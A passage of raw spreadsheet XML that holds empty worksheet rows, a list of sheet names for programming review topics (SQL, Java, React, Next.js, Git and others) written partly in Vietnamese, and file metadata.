    <row r="2" ht="331.2" spans="1:5">
      <c r="A2" s="1" t="s">
        <v>2156</v>
      </c>
      <c r="B2" s="1" t="s">
        <v>2157</v>
      </c>
      <c r="C2" s="1" t="s">
        <v>2158</v>
      </c>
      <c r="D2" s="1"/>
      <c r="E2" s="1"/>
    </row>
    <row r="3" ht="409.5" spans="1:5">
      <c r="A3" s="1" t="s">
        <v>2159</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>2160</v>
      </c>
      <c r="C3" s="1"/>
      <c r="D3" s="1"/>
      <c r="E3" s="1"/>
    </row>
    <row r="4" ht="244.8" spans="1:5">
      <c r="A4" s="1" t="s">
        <v>2161</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>2162</v>
      </c>
      <c r="C4" s="1"/>
      <c r="D4" s="1"/>
      <c r="E4" s="1"/>
    </row>
    <row r="5" spans="1:5">
      <c r="A5" s="1"/>
      <c r="B5" s="1"/>
      <c r="C5" s="1"/>
      <c r="D5" s="1"/>
      <c r="E5" s="1"/>
    </row>
    <row r="6" spans="1:5">
      <c r="A6" s="1"/>
      <c r="B6" s="1"/>
      <c r="C6" s="1"/>
      <c r="D6" s="1"/>
      <c r="E6" s="1"/>
    </row>
    <row r="7" spans="1:5">
      <c r="A7" s="1"/>
      <c r="B7" s="1"/>
      <c r="C7" s="1"/>
      <c r="D7" s="1"/>
      <c r="E7" s="1"/>
    </row>
    <row r="8" spans="1:5">
      <c r="A8" s="1"/>
      <c r="B8" s="1"/>
      <c r="C8" s="1"/>
      <c r="D8" s="1"/>
      <c r="E8" s="1"/>
    </row>
    <row r="9" spans="1:5">
      <c r="A9" s="1"/>
      <c r="B9" s="1"/>
      <c r="C9" s="1"/>
      <c r="D9" s="1"/>
      <c r="E9" s="1"/>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row r="21" spans="1:5">
      <c r="A21" s="1"/>
      <c r="B21" s="1"/>
      <c r="C21" s="1"/>
      <c r="D21" s="1"/>
      <c r="E21" s="1"/>
    </row>
    <row r="22" spans="1:5">
      <c r="A22" s="1"/>
      <c r="B22" s="1"/>
      <c r="C22" s="1"/>
      <c r="D22" s="1"/>
      <c r="E22" s="1"/>
    </row>
    <row r="23" spans="1:5">
      <c r="A23" s="1"/>
      <c r="B23" s="1"/>
      <c r="C23" s="1"/>
      <c r="D23" s="1"/>
      <c r="E23" s="1"/>
    </row>
    <row r="24" spans="1:5">
      <c r="A24" s="1"/>
      <c r="B24" s="1"/>
      <c r="C24" s="1"/>
      <c r="D24" s="1"/>
      <c r="E24" s="1"/>
    </row>
    <row r="25" spans="1:5">
      <c r="A25" s="1"/>
      <c r="B25" s="1"/>
      <c r="C25" s="1"/>
      <c r="D25" s="1"/>
      <c r="E25" s="1"/>
    </row>
    <row r="26" spans="1:5">
      <c r="A26" s="1"/>
      <c r="B26" s="1"/>
      <c r="C26" s="1"/>
      <c r="D26" s="1"/>
      <c r="E26" s="1"/>
    </row>
    <row r="27" spans="1:5">
      <c r="A27" s="1"/>
      <c r="B27" s="1"/>
      <c r="C27" s="1"/>
      <c r="D27" s="1"/>
      <c r="E27" s="1"/>
    </row>
    <row r="28" spans="1:5">
      <c r="A28" s="1"/>
      <c r="B28" s="1"/>
      <c r="C28" s="1"/>
      <c r="D28" s="1"/>
      <c r="E28" s="1"/>
    </row>
    <row r="29" spans="1:5">
      <c r="A29" s="1"/>
      <c r="B29" s="1"/>
      <c r="C29" s="1"/>
      <c r="D29" s="1"/>
      <c r="E29" s="1"/>
    </row>
    <row r="30" spans="1:5">
      <c r="A30" s="1"/>
      <c r="B30" s="1"/>
      <c r="C30" s="1"/>
      <c r="D30" s="1"/>
      <c r="E30" s="1"/>
    </row>
    <row r="31" spans="1:5">
      <c r="A31" s="1"/>
      <c r="B31" s="1"/>
      <c r="C31" s="1"/>
      <c r="D31" s="1"/>
      <c r="E31" s="1"/>
    </row>
    <row r="32" spans="1:5">
      <c r="A32" s="1"/>
      <c r="B32" s="1"/>
      <c r="C32" s="1"/>
      <c r="D32" s="1"/>
      <c r="E32" s="1"/>
    </row>
    <row r="33" spans="1:5">
      <c r="A33" s="1"/>
      <c r="B33" s="1"/>
      <c r="C33" s="1"/>
      <c r="D33" s="1"/>
      <c r="E33" s="1"/>
    </row>
    <row r="34" spans="1:5">
      <c r="A34" s="1"/>
      <c r="B34" s="1"/>
      <c r="C34" s="1"/>
      <c r="D34" s="1"/>
      <c r="E34" s="1"/>
    </row>
    <row r="35" spans="1:5">
      <c r="A35" s="1"/>
      <c r="B35" s="1"/>
      <c r="C35" s="1"/>
      <c r="D35" s="1"/>
      <c r="E35" s="1"/>
    </row>
    <row r="36" spans="1:5">
      <c r="A36" s="1"/>
      <c r="B36" s="1"/>
      <c r="C36" s="1"/>
      <c r="D36" s="1"/>
      <c r="E36" s="1"/>
    </row>
    <row r="37" spans="1:5">
      <c r="A37" s="1"/>
      <c r="B37" s="1"/>
      <c r="C37" s="1"/>
      <c r="D37" s="1"/>
      <c r="E37" s="1"/>
    </row>
    <row r="38" spans="1:5">
      <c r="A38" s="1"/>
      <c r="B38" s="1"/>
      <c r="C38" s="1"/>
      <c r="D38" s="1"/>
      <c r="E38" s="1"/>
    </row>
    <row r="39" spans="1:5">
      <c r="A39" s="1"/>
      <c r="B39" s="1"/>
      <c r="C39" s="1"/>
      <c r="D39" s="1"/>
      <c r="E39" s="1"/>
    </row>
    <row r="40" spans="1:5">
      <c r="A40" s="1"/>
      <c r="B40" s="1"/>
      <c r="C40" s="1"/>
      <c r="D40" s="1"/>
      <c r="E40"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SQL_Review Checklist</vt:lpstr>
      <vt:lpstr>Java_Review Checklist</vt:lpstr>
      <vt:lpstr>angular</vt:lpstr>
      <vt:lpstr>c#</vt:lpstr>
      <vt:lpstr>java spring</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>Git</vt:lpstr>
      <vt:lpstr>Java core</vt:lpstr>
      <vt:lpstr>fe-js</vt:lpstr>
      <vt:lpstr>ôn tập thêm</vt:lpstr>
      <vt:lpstr>reactjs</vt:lpstr>
      <vt:lpstr>Sheet1</vt:lpstr>
      <vt:lpstr>ctdl &amp; gt</vt:lpstr>
      <vt:lpstr>Oop</vt:lpstr>
      <vt:lpstr>fetch-form-route</vt:lpstr>
      <vt:lpstr>nền tảng fe</vt:lpstr>
      <vt:lpstr>html &amp; css</vt:lpstr>
      <vt:lpstr>fe-ts</vt:lpstr>
      <vt:lpstr>web-platform</vt:lpstr>
      <vt:lpstr>http&amp;net&amp;api</vt:lpstr>
      <vt:lpstr>react-per-pat-test</vt:lpstr>
      <vt:lpstr>state global</vt:lpstr>
      <vt:lpstr>nextjs</vt:lpstr>
      <vt:lpstr>cicd-sercuity-per-architure</vt:lpstr>
      <vt:lpstr>dễ gặppvan</vt:lpstr>
      <vt:lpstr>tanstacjk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Tiến Lê</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-02T08:59:31Z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35BF685C4BB14792B596F51DC3B5F782_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.1.0.26880</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="CalculationRule">
    <vt:i4>0</vt:i4>
  </property>
</Properties>
</file>